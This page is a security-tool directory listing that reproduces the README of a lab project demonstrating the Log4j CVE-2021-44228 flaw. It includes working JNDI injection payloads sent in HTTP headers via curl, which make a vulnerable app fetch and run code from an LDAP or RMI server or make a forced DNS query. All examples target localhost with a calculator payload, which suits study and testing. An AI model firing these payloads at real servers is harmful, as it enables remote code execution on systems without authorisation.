Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
log4j-cve-2021-44228 — Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ... | Kitploit
Tools/GitHubGitHub/manuel-alvarez-alvarez/log4j-cve-2021-44228
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubmanuel-alvarez-alvarez/log4j-cve-2021-44228

log4j-cve-2021-44228

Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
514 years agoNot yet reviewed

Log4j CVE-2021-44228 and CVE-2021-45046

Requisites

Use a vulnerable JDK, for instance JDK 1.8.0_181

Usage

Malicious server

The malicious server deploys the following endpoints:

  • 1389 LDAP server
  • 1099 RMI server
  • 8081 HTTP server
root@kitploit:~
./gradlew :malicious-server:bootRun

Vulnerable application

The vulnerable application deploys one HTTP endpoint at 8082

root@kitploit:~
./gradlew :vulnerable-app:bootRun

Remote Code Execution

Choose a payload that will be executed by the vulnerable app and encode it in Base64. As an example, in order to open the calculator in Windows: calc.exe

LDAP

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

RMI

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

DNS queries

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/
Download Tool